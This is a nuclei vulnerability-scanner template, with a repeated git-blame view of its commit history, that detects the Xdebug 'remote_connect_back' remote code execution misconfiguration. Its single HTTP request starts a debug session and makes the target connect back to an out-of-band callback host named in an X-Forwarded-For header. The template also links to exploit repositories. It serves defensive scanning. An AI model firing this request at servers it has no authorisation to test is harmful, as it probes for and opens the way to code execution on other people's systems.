nuclei-templates/http/vulnerabilities/php/php-xdebug-rce.yaml

id: php-xdebug-rce

info:
  name: Xdebug remote code execution via xdebug.remote_connect_back
  author: pwnhxl
  severity: high
  description: |
    The XDebug extension <= v2.6.0 for PHP is designed to expand the debugging capabilities of developers, including the ability to perform remote debugging. A misconfigured server, with ‘xdebug.remote_connect_back’ enabled, exposed to the internet could allow an unauthenticated remote attacker to trigger a debugging session using any IP via a simple web request. With a remote debugging session established, the attacker effectively has remote code execution (RCE) capabilities with which to establish persistence, exfiltrate data, or launch further attacks against the system or network.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
    - https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
    - https://paper.seebug.org/397/
    - https://github.com/D3Ext/XDEBUG-Exploit
  metadata:
    max-request: 1
  tags: oast,rce,vulhub,php,debug,xdebug,intrusive

http:
  - raw:
      - |
        GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: {{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: header
        words:
          - 'Set-Cookie: XDEBUG_SESSION={{randstr}}'

      - type: status
        status:
          - 200

# digest: 4a0a00473045022060524c10c10e17d2c4a8d20858d9437f9dd40c4bf5fd829623777541978ed368022100d1a127e5cf2e01e07a030b73824efa3fa8b35f4f38304c0d620717b379d59a22:922c64590222798bb761d5b6d8e72950
-												add php-xdebug-rce

											
										
										
											2023-03-13 12:40:41 +00:00
+								id: php-xdebug-rce
 								info:
-												fix-template
											
										
										
											2023-03-16 21:01:48 +00:00
+								  name: Xdebug remote code execution via xdebug.remote_connect_back
-												add php-xdebug-rce

											
										
										
											2023-03-13 12:40:41 +00:00
+								  author: pwnhxl
 								  severity: high
-												fix-template
											
										
										
											2023-03-16 21:01:48 +00:00
+								  description: |
 								    The XDebug extension <= v2.6.0 for PHP is designed to expand the debugging capabilities of developers, including the ability to perform remote debugging. A misconfigured server, with ‘xdebug.remote_connect_back’ enabled, exposed to the internet could allow an unauthenticated remote attacker to trigger a debugging session using any IP via a simple web request. With a remote debugging session established, the attacker effectively has remote code execution (RCE) capabilities with which to establish persistence, exfiltrate data, or launch further attacks against the system or network.
-												add php-xdebug-rce

											
										
										
											2023-03-13 12:40:41 +00:00
+								  reference:
 								    - https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
 								    - https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
 								    - https://paper.seebug.org/397/
-												fix-template
											
										
										
											2023-03-16 21:01:48 +00:00
+								    - https://github.com/D3Ext/XDEBUG-Exploit
-												Added max request counter of each template

											
										
										
											2023-04-28 08:11:21 +00:00
+								  metadata:
 								    max-request: 1
-												templateman update

											
										
										
											2023-10-14 11:27:55 +00:00
+								  tags: oast,rce,vulhub,php,debug,xdebug,intrusive
-												add php-xdebug-rce

											
										
										
											2023-03-13 12:40:41 +00:00
-												Refactoring the directory structure based on protocols (#7137)

* moving http templates

* updated cves.json

* moved network CVEs

* updated scripts

* updated workflows

* updated requests to http

* replaced network to tcp

---------

Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
											
										
										
											2023-04-27 04:28:59 +00:00
+								http:
-												add php-xdebug-rce

											
										
										
											2023-03-13 12:40:41 +00:00
+								  - raw:
 								      - |
 								        GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
 								        Host: {{Hostname}}
 								        X-Forwarded-For: {{interactsh-url}}
 								    matchers-condition: and
 								    matchers:
 								      - type: word
 								        part: interactsh_protocol
 								        words:
 								          - "dns"
 								      - type: word
 								        part: header
 								        words:
 								          - 'Set-Cookie: XDEBUG_SESSION={{randstr}}'
 								      - type: status
 								        status:
 								          - 200
-												TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot:

											
										
										
											2023-10-20 11:41:13 +00:00
 								# digest: 4a0a00473045022060524c10c10e17d2c4a8d20858d9437f9dd40c4bf5fd829623777541978ed368022100d1a127e5cf2e01e07a030b73824efa3fa8b35f4f38304c0d620717b379d59a22:922c64590222798bb761d5b6d8e72950